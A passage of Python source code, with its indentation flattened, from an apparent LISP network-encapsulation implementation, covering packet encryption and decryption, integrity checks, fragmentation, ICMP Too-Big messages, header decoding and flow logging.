ts = lisp_get_timestamp()
aead = None
encode_ciphertext = False
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
encode_ciphertext = True
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Chacha produced ciphertext in unicode for py2. Convert to raw-
# unicode-escape before proceeding, or else you can append to strings
# generated from different sources. Do this in do_icv() too.
#
if (encode_ciphertext):
ciphertext = ciphertext.encode("raw_unicode_escape")
#endif
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
# ciphertext. Needed to interoperate with the Go implemenation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
# IV, and the cipertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
# Get the IV and use it to decrypt and authenticate..
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
# This is the 4-tuple NAT case. There another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
# Call AES or chacha cipher. Make sure for AES that
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Now decrypt packet and return plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep self.packet the outer header, UDP header, and LISP header.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
# Now fix outer IPv4 header with fragment-offset values and add the
# IPv4 value.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
def send_icmp_too_big(self, inner_packet):
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
elapsed = time.time() - lisp_last_icmp_too_big_sent
if (elapsed < LISP_ICMP_TOO_BIG_RATE_LIMIT):
lprint("Rate limit sending ICMP Too-Big to {}".format( \
self.inner_source.print_address_no_iid()))
return(False)
#endif
#
# Destination Unreachable Message - Too Big Message
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 3 | Code = 4 | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | unused | MTU = 1400 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Internet Header + 64 bits of Original Data Datagram |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
mtu = socket.htons(1400)
icmp = struct.pack("BBHHH", 3, 4, 0, 0, mtu)
icmp += inner_packet[0:20+8]
icmp = lisp_icmp_checksum(icmp)
#
# Build IP header. Make source of ICMP invoking packet the destination
# and our address the source. We can get our address when we thought
# we could encap. So lisp_packet.outer_source has the RLOC address of
# this system.
#
host = inner_packet[12:16]
dest = self.inner_source.print_address_no_iid()
me = self.outer_source.pack_address()
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# host byte order. We need to build the total-length field just like
# lisp_packet.encode(), checksum, and then fix outer header. So that
# logic is semantically repliciated here. Same logic is in lisp_packet.
# fragment() as well.
#
tl = socket.htons(20+36)
ip = struct.pack("BBHHHBBH", 0x45, 0, tl, 0, 0, 32, 1, 0) + me + host
ip = lisp_ip_checksum(ip)
ip = self.fix_outer_header(ip)
ip += icmp
tb = bold("Too-Big", False)
lprint("Send ICMP {} to {}, mtu 1400: {}".format(tb, dest,
lisp_format_packet(ip)))
try:
lisp_icmp_raw_socket.sendto(ip, (dest, 0))
except socket.error as e:
lprint("lisp_icmp_raw_socket.sendto() failed: {}".format(e))
return(False)
#endtry
#
# Caller function sends packet on raw socket. Kernel routes out
# interface to destination.
#
lisp_last_icmp_too_big_sent = lisp_get_timestamp()
return(True)
def fragment(self):
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet. Do MTU discovery if
# configured with env variable.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
if (lisp_icmp_raw_socket != None):
inner = packet[outer_hdr_len::]
if (self.send_icmp_too_big(inner)): return([], None)
#endif
if (lisp_ignore_df_bit):
frag_field &= ~0x4000
else:
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = old_div(frag_field, 8)
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, raw sockets prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order. So have to byte-swapped here. But when testing
# we (UPC guys) discovered the frag field didn't need swapping. The
# conclusion is that byte-swapping is necessary for MacOS but not for
# Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3:4] + packet[2:3] + \
packet[4:6] + packet[7:8] + packet[6:7] + packet[8::]
else:
packet = packet[0:2] + packet[3:4] + packet[2:3] + packet[4::]
#endif
#endif
return(packet)
#enddef
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error as e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error as e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error as e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def is_lisp_packet(self, packet):
udp = (struct.unpack("B", packet[9:10])[0] == LISP_UDP_PROTOCOL)
if (udp == False): return(False)
port = struct.unpack("H", packet[22:24])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
port = struct.unpack("H", packet[20:22])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
return(False)
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = self.lisp_header.get_instance_id()
if (is_lisp_packet):
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key, addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Chacha produced plaintext in unicode for py2. Convert to raw-
# unicode-escape before proceedingl Do this in do_icv() too.
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
packet = packet.encode("raw_unicode_escape")
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9:10])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6:7])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (iid not in lisp_iid_to_interface): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
#endif
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9:10] if self.inner_version == 4 else packet[6:7]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
#endof
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
#endif
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header(object):
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
